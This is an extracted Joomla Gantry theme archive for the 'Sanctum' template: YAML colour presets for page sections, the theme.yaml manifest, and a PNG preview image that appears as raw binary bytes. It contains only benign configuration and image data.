      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    utility:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    maintop:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    systemmessages:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    sidebar:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    mainbody:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    aside:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    mainbottom:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    extension:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    additional:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    prebottom:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    bottom:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    afterbottom:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    last:
      background-color: '#ffffff'
      background-image: 'gantry-media://doves.png'
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    footer:
      background-color: '#282828'
      background-image: 'gantry-media://footer.jpg'
      background-repeat: 'no-repeat'
      background-size: 'cover'
      background-attachment: 'scroll'
      text-color: '#6f6f6f'
      heading-color: '#ffffff'
    copyright:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#959595'
    offcanvas:
      background: '#ffffff'
      text-color: '#959595'
      toggle-color: '#959595'
      overlay: 'rgba(0, 0, 0, 0.6)'PK!Q�Z	Z	it_sanctum/gantry/theme.yamlnu&1i�details:
  name: Sanctum
  version: 1.6.0
  icon: paper-plane
  date: October, 2016
  author:
    name: InspireTheme LTD
    email: office@inspiretheme.com
    link: http://www.inspiretheme.com

  documentation:
    link: http://docs.gantry.org/gantry5

  support:
    link: http://www.inspiretheme.com

  updates:

  copyright: (C) InspireTheme LTD. All rights reserved.
  license: GPLv2
  description: Sanctum Theme
  images:
    thumbnail: admin/images/preset1.png
    preview: admin/images/preset1.png

configuration:
  gantry:
    platform: joomla
    engine: nucleus

  theme:
    parent: it_sanctum
    base: gantry-theme://common
    file: gantry-theme://include/theme.php
    class: \Gantry\Framework\Theme

  fonts:
    roboto:
      400: 'gantry-theme://fonts/roboto_regular_macroman/Roboto-Regular-webfont'
      500: 'gantry-theme://fonts/roboto_medium_macroman/Roboto-Medium-webfont'
      700: 'gantry-theme://fonts/roboto_bold_macroman/Roboto-Bold-webfont'

  css:
    compiler: \Gantry\Component\Stylesheet\ScssCompiler
    paths:
      - gantry-theme://scss
      - gantry-engine://scss
    files:
      - sanctum
      - sanctum-joomla
      - custom
    persistent:
      - sanctum
    overrides:
      - sanctum-joomla
      - custom

  block-variations:
    Title Variations:
      title-center: Title Centered
      title-clean: Title Clean
      title-border: Title Border
    Box Variations:
      box1: Box 1
      box2: Box 2
      box3: Box 3
      box4: Box 4
    Effects:
      shadow: Shadow 1
      shadow2: Shadow 2
      rounded: Rounded
      square: Square
    Utility:
      disabled: Disabled
      align-right: Align Right
      align-left: Align Left
      center: Center
      full-width: Full Width
      equal-height: Equal Height
      nomarginall: No Margin
      nopaddingall: No Padding

admin:
  styles:
    core:
      - base
      - fonts
      - fontsizes
      - accent
    section:
      - drawer
      - top
      - header
      - navigation
      - breadcrumb
      - fullwidth
      - showcase
      - intro
      - feature
      - subfeature
      - utility
      - maintop
      - systemmessages
      - sidebar
      - mainbody
      - aside
      - mainbottom
      - extension
      - additional
      - prebottom
      - bottom
      - afterbottom
      - last
      - footer
      - copyright
    configuration:
      - breakpointsPK!k ��[[#it_sanctum/admin/images/preset6.pngnu&1i��PNG


IHDR�����tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:0F42A83A858C11E68F6187F5D2A25985" xmpMM:DocumentID="xmp.did:0F42A83B858C11E68F6187F5D2A25985"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0F42A838858C11E68F6187F5D2A25985" stRef:documentID="xmp.did:0F42A839858C11E68F6187F5D2A25985"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��\W�IDATx��x#�Ն5U��^ۻk{{��R��	��SB�Z!@���z_�����{_�]��զ�3�-�FŲ-ْ����][�fFW�~��3�C��2��uA�	�����wwwww����������������� � � � � � �qqqqq�;�;�;�;�;�;@�@�@�@�@�������wwwww����������������� � � � � � �qqqqq�;�;�;�;�;�;@�@�A|C��E3�
���Y6�<��;hm�&�u���^��. ���@�A+ZNv��<��ٛ������Z	���c��}�҆�A���րX��?����@��2�b:{��(�*��)h�B��D(Z�g�(�U2��z�[�
�OZ��2'�)���5���~66���X&�@���MqoS�N��ǟ��Ƅ�G�I4��q�s����?�.Z�?Z,Y%��S�����t��l��U�Ē�X3�y`�����<*mh�/s��F��'/S���<ə���;�QL�ߤ2'�'�vn�#���Yd[4��s�L��Ģe����L����?H��hj�F@�;�
q�&������'#��ٔ���
����>2W��mb5�&�w��l��)���
���a�c�[��)�q��wY��4
}�GX�4t�9��oK���˦�F���R���'�D�d;.6��{b�&�&^zRn�`�c�u!��8�%Ғ�}F<�־�B|;�@�#�*���l�i��*c4�1����'��o*�8i�S~
8�^�fO���iǺ�3?�^و��9�[��C�ᢩh�e�&����]�ߕՀ�駾�5�g�)��^
x�U1�+��	�2O���|=�2q�kf�T�d��Ē�2�}�LY�u��Žr�xv�bۋ;�}�=������ٵ5n�0O�G� �����o�=����8�[�M}��֖���}L�D�r�}�4Y�7�3��Q��&�y�iK�_�Z8��I�+/KV|%��B�}WՇ��&�=����������G����ۖ�C-����T��dr*s�P0����EƁ!��
$-U&ش0�]�j�]���g�{�pf�}�4�����J7s�ߩ��+v�ĝ�0���X� N�ڍc{�/���x� M<���ډ;��*
�-]n4
��3��Eמ�~�Ud�@�3�
���C,w��܏n?[y��+;��x45��6�=��M������
��כ�|�-���ާ����6� �u��W�����U����R�Y�U���Y%�i��iƁO3]n2�F�Χ6Q�\�-�+�T�PwR��A: e�E5�=PV˜a�`;�$6R�+v�O��y����W]����ȡ�e��*�-�;h[��m�[ey�����0MC�Fw�#K.˜)U�r�뚉!}�y�DŽ�}�/���8w�-�T��p����g�����e@�V�e5?��"�����LC^�ڍ7Ԧn�R+�{ǐc�m�e{�_/��v�xn�T}�L�KgN�s.�y��db7��Y��8S#����fS2��v��ޟ�̉��_�F�^nM�K&�n�u�	],ӖȂ��-�?Q��^�s��-M
���<<�@@7��F����3y�(�.��W���
u�bC�}���ם�O�k�~�Y�ĝ0��5�}��d�߀�� � rʮ�t��n��W�IR���C+�/�	O$c�i�t�\E܅…��/�����W�ދn݅A�f4h8�[Sd��+��i��l����u+����BPfݛ�����o�l���ܯ�w��~�2�g�ˍ�ڂ ���|D�;�� ����Aĥ�HP�,rƾ�0�n#�4U��?)U�q�?)���8
�����@<�?pR�f�j7�:s�k�cb�V�P��C^t��)�WB/�
K�ɨ.�&o�o��c�6�����'����f�
g_6C,�y#�l���L�/_�P�ȱ�F���l����;��P�@�(2�'����\’��98�:r��;�|�T̈�b_3yW�v>�~���쩀�~��1:Kӓ2���~J�>.-a�>�C+U�-�Z��ޣ3���
���.G�-6~����bG٩�Q�k�n�@��r��D�!�Eb�o�b���uhϭ��0ҒKeN0|Z{�4��6����	謩1�:Q,��w�V�Er�ԅn��G�%�q�n�:Ü��}���_:7�Z(����ǡ������}

��_����>�D\�� ����FDM�7T�[3L�j��&� (��
�2\���5�LY���㪞���'�P�9@�#�O[C����+����])�N}��]m�R��G��g�}���6j��S�9`~.�X:k�X�/�Z�˶��W�"�	b��#8��f���:�N�:����Έ̣?tv�pad���Ӱ���v�5�0���y��yB&t5��u�.�������%S��Ts�s.iM����-�v?'-�Ovo��q��1ۛ�-�Z���;�i�M�L�I&�Uf2��y��f�s���x�]��i
m':�[ǵ� ��e��+���p��Wj_���ɻ��/"d�@e*UoM7��w��w�&a�>���M�)ޟ�vcM�^��ZT�L2��^�����{�q���b©omF�xlj1�|�ʚ�8t�%�Q�Z��`:]lC�2�Z/�N������nqW��xo�����{@ũ�G�|�AJ���t��P:�>�<��r�s�by�;�?��xv���tNj�ݤ�];��ݜEI�5�y����w�{”�v��λ�L������(���b�f�r���>����v�$��g
����YYo��%�d ��"�["��*��o˥i�[��~'��K��a�=��+��/p^�{�>V�s����x�����EM����b�j��gC),�L&���2�'��ϲ�RН�S����V7�Y��Q5mΕ+Oz^)U
(�9�P�M�Lb�2��B�w��m�!�.�<_�:�0�x��8���?�I�-�~�y��/s��R(Z� �9����Wk�WR�$1���*��L��~3��h�X�S���g 3]o5
{5�SK���dG���;̢2�Q�Ʉ�'��:W�cw�m˽�M�4�s��*��%�P-�6��P�0f�3�B�m�y�׮=�L���NZ;[g��-%�?�3�l{�?�〧��n�w�t��ν\Uv��J�%g�p�GW��W�=�P@֙k۟��t�����G?�|�0�,��e2�z�LLZrU�l�ޗ���1��S�B!�*L.�O��_������[�`�}����u=��^������ce
�Xu�̕��v_��3�����O~E�Yp@����Lh�V�e����ֽ#H�Κ��^*;�0]o�3�{#��)�hH��GgO�̚����Z��+�t|��҇+�Qw��޳K7�'>W.�JG-L���+d�Q��{�;�t�����]���R��@y&qo�Y���6c�w%�>2ԛ�D�h����mU�k�
=IgN�]%R�v鱟���t}a�b��e��+��u.T):%-"S��q�
f���$��B�b�v��yO�V�8���%+�a��/����։y�'�V*m�l;�����L����n?K�r��'	��+A�����3M$�Y��z�)�Q��Xv�&{4p�N����aTR/�����G�N}��w73lvqoC�YS��3��%+d�i�%~Z����MV���T�;%��T��N���It�d��W:y�*v��^!YM"NRג�}Hk�+�q����sG
������ �m�I6��}��1a�UR�ا>�[uPv�(Fz�)� ��ҍ�J�[��;^�,�����*��F�vb8�V�Ȕ�汅#0�RJ�����L��;��,�-�B�A��&h1٥-M1��=��c�K<��'�#�vn{8Ļ��a{�F��_�W^���g�u�c�'t�ae�Y׮?ۗL�����~M��PV!����6D��2W�Xs����L�{�s�-���Y�
/M��)���y����C뻱������v��!T���}���DeNԿ�|�m�H�п�`�6g��}��{�6�}�l5IrDq��ƻ��{!���?�?�v*���Q*m���C�;��a���wf��w�ẗ́n�I?���J0I��U�k������L���cw.�Hv��b�&"q�E�1��� �"�x~oSg�⯊���	��=��<��U���X[$8�Ve}�t����W�
'w|�b�G��1��/<�;�2��
���IN��C�~����E��v>`��Z�K��ԛ��K����`SMC^���L�ޜKV��N}ˍ�,;(��/����˶(2��U:��gшh�V�l?��3�9��f;���6$��m���J!���_���\*%�R2��>L8����Ej�|��ۧTҘ��̥�z�8^���TESi?�|�̬{_⎼g��+gr/�çaf��_yr�խ�>b���]�
X�{_�O���;Kt*�_��i�Y	Sf��l���J(�={�e�B]�j�/��&�
:�2�ͺ�ܾ��[��fwn{ص�y�
m>B��o�1�{��,,��@�A�ı�F��/�C����p���b���L��k���7B-�GY����8u�_�\���~GG�eҏ� �臊��ܚ�w��%rh4l��c>b:]Kw��4�-��dbw��&
�ԍ5�e�2� T)�v��)r���}T�2�'�&3]n
�ycr��e��n?#��%���z�Q���J��Gt�e���KgN��
��d5iΦR�N�39sմ
J�x��ɑ*;E&�V��R��d׶,��]�t��mm�(eV�O(Z�OlZ�ܣ�q/l�?����4:#��^i�/�@�a{?h�T��ڗ���c��3�n|V$�.��׽}�2*mhL}#��#�o�]ej�� ْ#t���#1@��&he�}6O��2u1A[��d�l_�1�s��uα��ZWI�u�**m����W���	}X˔�_������?�m��i�k_:U(X[c,��w5���*��D=���5�[�eZL��Z���,ڵ�T�h�ȷ�
J	����?C:�J�_S,� �.7���ɚ�V�2�t��Ўe��ʷi�NG%���*�w�p�[ot�X��Ιm%�Qc-���,���1,��w��̻ʣ�L��L#�T�dC�*���J�k矴��e�O���\�7��~�Ȧ��(�F��mw��Ź�����e�j�FVE���h� X^6��7j�b�Q:�b˜Ag�6���0'D�y�w6Y8���t\9A����K�f�T�=p&w��a�a:� ����h�ʶIe��Na�$K0�B�"�U��f�y>��_���;��ed��xI �p㽫T�C�>����6��_���H���ֆ���O��(f�ih]1U׮g�#�7s�Z�/�������t�C�eӱ�&}jx�iW���w�~α|N+���{r4�}h2z�:c�v� � Zp�p��B�쮖�z����6��}�����Ee��q��|�p�}�4�:��1yI��(����+�.���KG�;�$w���<�ݑ�̀iгl�{Ȕ�dR/�;�;��5m��i���U�w�܈�M��h	�s�I�1�2}�ך���\l����;�h3_,�j[2Iv����t�Ydb��n�K�k�������ur�x��D�"U}�`E�p�RwNH�G]!7'�;h�O3yW3yW�F�m���b�&���iF(�ٹ�nIS��f������X$;��n
�<t��2��̕{m�Ɔ��4�U��^�����ӽq8�z"��J6��W��l�˹������iz�q�L���l�_�^�EΞ��J�L���o	���̖iK=�p�T}$�~�2�2y��ٝ%��W�� ��S�um ��*G�z-����^!�N4۹��6�\�1'���_L��K'@gM&�d��A'P)�N�0����4a�
�.�'Y&�d�+Ų-u��(����2z�'�m�B�X�� �0S (�MgO���ӊA�pk��h��6y:_�t�Y�`|�na��%�OJ���|��o
њ:���bW�� 6��q;�i��M~�Ȱ=�c{�m�eC�C���4u~��q�_	c�k�s���L�&x1z�0f����juWT8�G�H��;6�Vw�#Pc��P&<�͵��H��T�
M�o�	]��}��d˜d���ċ�o	�2 �pʀ�o�B�,84F�I�j�}�L_����Xs���D-l��%;`&ӹ����5�E�4���iS��ekғ鯧�#��,,Z���~�e�|��;�3�4~UY�{J���L�5�L�q5r��N'LY�IoB�t��gץ,�I�CX�O�[��v��Wc�,��R�����gO��^%a̰L���&�n�7�g6��X���˪ǘ���f��
��>���1^ � �����7�zԵ�����X���{�u\�ѽ�)��<�'��?�U�Sf�M���6�O�.�b{ރ�qq��_���O(h�*�=��r/�׆���C^d�>�T�;���w����.�]R�R4k���4���S݌���t�ɔ��g�[�]i���c�™y1���ƾuy"Ųm�,}��G}�0g�=�E;@�A�}��l�d��D����s�@�u��c{ޣn\��<;�9�@�l�P��W�RY���4��ܡ�t�T���T���U�h�&S��j��*��v�9��<o�v���r/t���P�,��k"d&=�v�u��gĶ�e�B���<��3���ҍ�sv���ޟųk+�b�k�E�1��f��e�w�6{�h�/��V���9�\�<A)���ww�T�ط�(0�B�k6��yq�F���X�Ҍl�{̣?�L[�͙�l�C�|���\�}��f��aɩ9��x��Ȓ"��whv϶q&ѻ�@�A�AgO3z�ν�J�R�`�n�/U쪷\j��F���dؠےJ���0��x
np���M����;����a��7v���ܾ��A��t<�.��P][Yr�LR�f��y2u���c �m{x��B��Qͺ�k�s��/�{bM���`�!��WJ4N�&��tk��=����D��m�o���*}��I�ƻ�3?EQ�4wne��_�������gY�.t���4B�ع*s����u7i6�f��+Ư��(��#�����O�b��fKV?A|��vu��&;��\�Ɗ��Y�>u��e��w�b��F-�F�-Wx)o;i_>'�^5�]��O
��-GZ:����{��Ȅnh�;�U�=����G���O;��"�U(��~�}q�$h�"L��-:�~�� � &�EW���"6וHRՑ���{$O�[�C�x?���l��ZK�5�xϻ�[V@�Al!U�/�����g�A��~�k�3�ɯ"���gtW��$�Zc�#�@`L�^C�L�;�]�[�-ے��$����:7�)��&2'<����F�s'�yR�N�?�UtLi��;����ܑ��sl�]�q�	���z��Q�!,y�y];��<�æ� � vQ���r
A~NmҒk���p�����A�܂�s�}vm�0�U�Q���$;K�w����r�a
~�ȴat��江��GO�r��2W����r_m7�iV��.Uy�����8��I���h�;h��'�{��mQ�0�r�����u�e�
�JT�)]j_:U��g�q?@.S����J�',��A��eщ����~�ZH:M���[,�B�iϮ�z���� �f��:�2uQ�Ⱥ���}�܈������;�z�뤵3��^��#t�Y�G�55� �e��
�YDeN0�|'�˜�-�����6��3���~�L]Lw�ۭ*U�ql��Q����I>/Іʘ;*�
c�'���V��>�F����@tzD��t�eʂ���s�zF[ {_��?4�d��>c����p�离,��~�|#��7		s{��0����w�\�~v��\�2F[����&�ل��;,ŬܫAi���k�8����q�кݪ���]��ܐ�L�ݰ���ۉ:�O�X�4�|p��z��<���ښ�m
��l��1�Z%4� �q�}�<�C�"�Κ̟�:�\9��i�E�\��
&\v�q�H��Ӳ�5��FXs�n��a�&U3��8�I�~Z�L
��u���H��~^8�F,�/V�l�U�&��b��Mm���@����p�6�D�x/\�60��2���-��ϫծe���_������3����YS<�
�PL��w�y�M!X��Tu�G�V��p�?Q��@Ǫ˸��*�!u��+d��+.j�&^���S�����;h>���^	S�3S��\��W���ЎL�.�TR_�ڹ1�{B7���npC���C”i���s����U}?�-���0,�S��3�	Rd�\���0Ո�}�d�T׿�2<�q�W}v�p�{:��6����-�~��7���D&�r]�'��l�+����	�F�i�+m��..R����Xv�	�=�[wX��x�z5P�6^�0gy
:s��*;A[�.7Q����nn�^V�%������������*��ց�y?���e�L��j76������ܡx��.V�
�7|�?��k���w����ݵVy�Sksא�w�wW��5Ϥ�L�F�LdRo*s�m���_���q��m��q^�ȃ���b�l�+��Y��ސ
�dr_�M`����J�{�T�W��7�6�'�/w���_����E��r�[����?��Fs;7��-��IL��t�y�WL�;��R�D��;���cM���!���E~�|m�r�^wU�rw�(e���k��1��	���f��짠�w]��Ξ󐱝_AWY*�p�(Yt�����/Uq�lP�Y]�]�b�{m��~�E&v7
{��P�P���F�O~%�hR����؜?�¶�����jЎ��و�ؕ�g�]�������g�h�p�'���L?l�{|.���Pտt��I��T�h���W��k���c�m�*`1�"uaL�胸�h����87}Ț��bJŝ�(��݃�U��'�u7�hV�P]���El�����L���>o���C9K�h�04����-�XFu5�T�c�A�At��/�J��c��'#-�U,�4ߛ�|�(�o�QS~AQv�n0�܏ΞVc\�5�6r�P*u�!�
������
�w����w���y�=�o�aq�$�L�o"_}r�S��x�w�>_�`:���'��<Q:-�"�B�R�;�;h�E2�'3F���Q�&�����%���v��=�Yx���}�\�����?,9t�Y5o<���h5�{�P�ر�f��[�[lu
y � ������rOы;^�ni�#C_�O�.�R�̎�2B,Y��Ե��j�`{?�ٱ�WQ3�kv`������f���
e@�;���TT)�=-�2?����ڞ:X�q}�wL	������M*c4�9��)�n�F���&(+�AgO�c����fq��C�A4����)��	?�����1�N�l:Ƿ8_HӒɻ�:k�e�|�ȷ�޿k�U�wM����<��?Ea�1֙�sv�'|C0	1�-����D
��/�떻_z�(VG�,�A����?ӽ�['�S��d�a:]�M/l��6��w�F�M�nV�<��fʬ�m@��ר�( � ��^}L͛o�.V�pO��jsH�Ȏ_q׾��. �+/�s<�Ȇ�kV��}�8V]ֺ�Oݞ�W`�A�A���xG�L�!���T�%�'2�}T��k����ݡ��&�c�u�%���A����'��c��b���|�X��q%�����	��}ОW�ݱ�מ��D���?���&�l��"�!ȶ�&B��M$���\(\P'����
M©oij�4z}oCNf2~�g-R��S]$��ĕ��+����
��G?�-i_y��*k�{�����@��B�Bn�έT��o�7�z��r�h'b��z��q:�2z�JRg�o{�VYeBc�{*�;�=�}�ν��|c���v�K�6ǹ�a�$H\;�rn�׾���n
h�+'un���(d�����a$α�:�/�;�C^��'+#پbN�\d� �E:���=Q������k���	F�F�ɢb��\�
KPf���1�4J��ɱ��`f�p򫚉${f���d;i[4ZY.x~e��gB�gb����c
�b�ƻ<�[�%��R�s1�Pi�����_�<
\�zSW�Gӵ�9Œ���15�\/��>�~�gÛ��J�LӼ`���MS�t����]��?��^9qokf�(���廑_�_�;mz�Ng�_o�VuO�69��*���H���ˆ�k�'�p n��ѻ�JMg�_4<:$c��e�b�����„
1�
���ޟ�K������!Ҁ�	]X�磖�4�F��1?�W&�9�i�4��&��q�>��s�]�+J�k��i��iK�҃Qk�ν�J�L-d���[,���/�b!��0��2��ߟ)�:}E��m��%�$��	�����΍�"K�HS�d;���'~KgMm�����օ'�}6�2�;�m�x�b7,w���j���!�]�R��蝒ɻ�8�Z+���l�"��
���=��{%^�v����b�r���f�]�L,^�|=)�o���(�mw���]O�@�#7�\���Ź���8�^�����İ�u���KU��.����٬����\T�5W�W^�o����1���=Iw��2eAd?�i�[�OwvM�KiG	�����(=P�!�R�湒��r#*e˒c�5B�"�d�}�wP}�;�m*k�����~�����!hK�I�,5E7	��5��y�������"��<Y��Fܛk+<al�O�2����ޛ̟�Ú�,�3�z�:g����2#�2s�I�}���H��u<���I�0v ��`:_�y(�k��/��]�ʹ}���H�����z+�uN(h�{D��=�M3��~a��ɻڿ&T���s{��]���_w�b�.�;Գ;\��e[0ܵ��r�S���^{�0�o>qw�F���5
>N�0��%���X/�J�;D��%�c�mby~X�H�Y�����"�\��g�Pj�q���t�i���s.Y�U��MN�o��sL��,�'�P�S��5�R��k���3�����!��������+��Y���a��Μ��sd�<�-��|}�ʮΗ]n�=#-�#[�>��-���8C⛳��s��=�`�{�ˢ9��Y$-�����[�
@�A��{3�b3yWxK���e�-� i���3�'��_f�;����a����T�zĽ�p3v(��|�ު-���Z^��	�|���\�D@�q�:�ʞNw��S����p�'E����R�1�b�"4B�/�y[s^�����}���?��ZG��,�8٦�+sqV]Z,Y)�n�h�����ɻ��G��I�-�:O��I��X>3�?�'��z?St垣a�H�^�M����k5�.�O(�"	q�1H#���`L�j�~��k����vR�x�M����������db�V�E�ܗ��SP�Ʉ.�R#�Z����HL�_��p�&���*197�i��2����"�b��P�#b��W��E&����fsM7ހ�mq��5��TW�C,Ϸ/�n�JY�/��X}�}�n�K1f��d&Y�;ɮ�b�V+�;���(:����M�J�j��^˷��R�Zݯ/��Lf�Ӏk����l&e/�,;K|�fL����韴�fA+\�#�@<}[��	v�|�;��ܞ���eP~�A0j��!ˊ�/��d�x��^�Qo��2&�j?���-��oN��ah�̵q�gQ��lF)�;���
T���s������X����3V�Hޫ�o�~A��	_��3���K��������N�*�я�[�hj�-g���]��pQ��l�����;\Q��PͿ��_�M��������9��ڗLj��b���o��*Z!��*v�*����1�����k��j�UBgO��uL&ta�҇+�H3�'�,Sljsb�6���>�m��A�$&��vV���t�t2�{��C��n}��e�vZn7�2��Ⱥ&�R<��NC'�HE'��T�W(Y)W�����{"�Ɖ˒,:�Mct�\󘏛��E�-�-^�<�C:��F}~�@2-c���p��X����]-/���_�Ĺ�+��5B�2ո���i�<aL��B2�/�-����� ��� :�#�v�y>�{�k!5��ۗ��*;alg��u��-��
©o+�G�{��eC}�N�:!vB�Ľ�-�"1b��}�Ϡ5����R~���k<贕ʜ`��]EZ;7��se��Wi7���g�F�KW�)B+N,�K7����$M���ԁ2W!s�1�sI����)�i��
\��ǗE��(b�,q���r��ڍ��AmɵL�Y1��N׶ԾP�Ub63�x�N	���g��B&����H���Ӵ&*����w"�
s
�3?�g�5�%�`q�o{Ax����1qQpk$v7G�x���<擖�l�3�_����:4d��}�Ų��;��e�"��������U�iw�0yWFP�\,^!�"��
�1�^�>7b���q���07|�L�߂~��Z�-�gS��zN}�({��{vm��]��e[�s3�J~ⶐ�.-�O~-/�a��	L�:�5|F� �����ʜ��5�F�$����
#�K]'ι4�� /s���wjIkz	l��B�|�pQ���	��PE���K7���)�ߐ�\��c�T�/�Ft�.�P��L#�rn��@P�9;����;���I������8�п����[�PMǟ3�J���pf^�q�{�avX'�>&s�db�+�/���q��硶����?i����L����Y�TԐ�:��x�X�B7�X&~GZ�q@�d�pv�S�~&��nl�(b���R�Kܾ��%�}E�=���שb�VF�t�}���#UGwyS�q������T�
X^�*�b����t�6؂&R�Ϯs���.v[�t�ZcD(\$.Ϯ��5�:^H&��҇S��{�'E�����]@r&�*����P��s�܂��x{M�r��]weg��3��t�g�w��]��n
��y^�k&S��G��
�p���o�ȱL[�����x�bq��։�Ben��&�����Ʉ�>�}�ˮ���6��~���<߾}�(Y��!clX}�~�v���ɘF��Qv�Zr���ؕ�ֵ�vN}���O�%��LYH�8�FNٿw��E/��ƙ�A�	�̻�я��_K��A=c�܏J�G���RF���](ZR7,���F}�fBVc�O�����P�S�\�o�Cq���+��,�%��l�|2��uܾ��}j���B,^ʟ�Z�A�^����8K;��Uj�4�"ێ+62�ԛJ�zQ(���oɔ��T����ʮn��C�%�E�3�	���!"[���Aφ��'�r�x\�Z��v�i��kf��c��d�Z���?,˽|��L�CY56�:ՔMP�S���������k�&��T��S&�罭�Y�IN(�E,�&�]����gT�;�	w�]݌H��d����.\d��ó5�a^��o��⊉�.�Sv��7�]�H�U�T*s"�ܗL�F&t�1�W����;%H���*�Q��	�Xx��LRXc����f�C�YgoV~u��6��u��\����bu�ꋁ[��l�.���G��}�l���d�R��!脋������%���ղ���⮬��S�Pi�-�V&�z�{�u��?X�u���qw�7`UO��w���9u��ȷ���X�ѱ�z����g2��ׂ6w��F��>�L�����Lq
[횳.�Ǔ��P�@8��X�)�gdSپ�*���K��?��L:z~�L��?�T}�����
[�?�|K���ƫ�^אּ�מt2���e��L&��gbS##�ß��'�A�F���R�+�-�яՎ������Q���q1&�IY�K�"����/U�E:_���O|�({=}1�r�п�>A[M��P�.;
e�A�RԿN�;]ӈK�~�����~W���Td�G�Z�r�;�>)�JdW�P�P�ɩ�}�?*}�fI�k��~ϸ)�{}P'�B�*c��쎡q1g��W�����:+�ˤI����	���L���]����}�qܥ<$�I�L�ˍ�ã�j��&:�JV;�>�WXc�e��Fxr���8��W
EK�[��f�	�z��=Q1O�̶��p�9���|�`k@�\R���Bw�Ӹ�X��G7�K�m�Gv�(��X��_[�n�x�p�1�FS{��[��Mu���]�(�j��MVvu�����[&�H0����S����r�ZrJU��3?�ؕ��$R�v���z��<�=e�R���m�5W������l���߅o�`Ǻ�,�D�;�Q��/06�E�z��~�wUKe`Wf��Zu��ٵڢ��R3����T���M�:H���㿈ƥ�q��+�����+%
EK������f!�
2��V�ػ���f/\��h�?m�W�e���~V�_k��`�fc�(k|g6ɵ�1	%� � ��>�u�]�a�w��m�y�ޗ�3?6���nEֵ1����X{��xH�.g�P�.Y��l��N�k����������k�_Ʉ.db/eBR�Yr�m�l�j&�S�:w�!`���ͦa�h�gU�v~s��;wИ����[�%R+�EOP�H;e��ʜ�s����T}4���I�霹Lޕdb�C��+�	OZ+:�
���	��ᅢŲ�H��T�
L�[�}�(-��c;��\�2/R)]���e�6S��Hj��P�:{�����~,�m�y��Ⱦr.�Е?8��q��l�{����
�;0.!���N�T��H��]�����s�}b�6*m�p�G�W˴%T��Y��"���k�[���:^�t��?
�"���z7��?٨�BuG#�Ar��Ϯ7��ȵ�[��p�2�q���謱ߣ�=/Ȣ�2�+���b�&��G�KQZ�<�K��M���\���
b��`���^�7Q�=RY�f��R�@zg��7��D�G�%N}�t�N��P�T����p�o$α&��C”�\�j��`�yߵ�Y��pOK��1�4�$�d;IZs�c�O2P&u���;��
��_T�4u���u�5����©o,�~��6;�_
����t��;�ґ�t��8�/M?5�$��H��S�:��ߙ��{h�V�xn�m^?��	����~�kc��l�ùm����x3a�N�"���+�k_q�s��eWl[묍�Pv��vn��헁��d?�f���O2מ穬�5ɱ�U�x�@��X��:S����|�20���S�S��՟m��=��2��hU�2Lj��o�aI�_���t�i�{��5O���`���2r����T�8I3���ڍm�*k�X�9��wa{��t�5`!fYt��?��+��L�D.��8�3�����:,UQ�Ak�����U�
k�O}G&v5TN|�%a騼QiE�	R��u7)s	a� ;
�Ƙ׮6�����O�>�$t"�$��I�e��U��S�g%g��,Q''ɩ\��d�9倒�@�NR�j_:��'o���(���n7
�[�M�,�-K0����ĠP��W)����J���}��!��_&���"͘x٩�g�U,_��K�U�Dw�Dn�97ߧ���F���aLY>���cjle�!��T�Gr�	��J&�"�$���}L,\�詟�"�-���Ut�e�����a���H�:�,)Լ�)����C^rn��g�Ᏺ�b������y=����t�d�B��_+3P��5�˶ٗNk��������	��/3�v��qȋ��8����x�	��j�V�������-]~e���g����4��Ⳣ\�
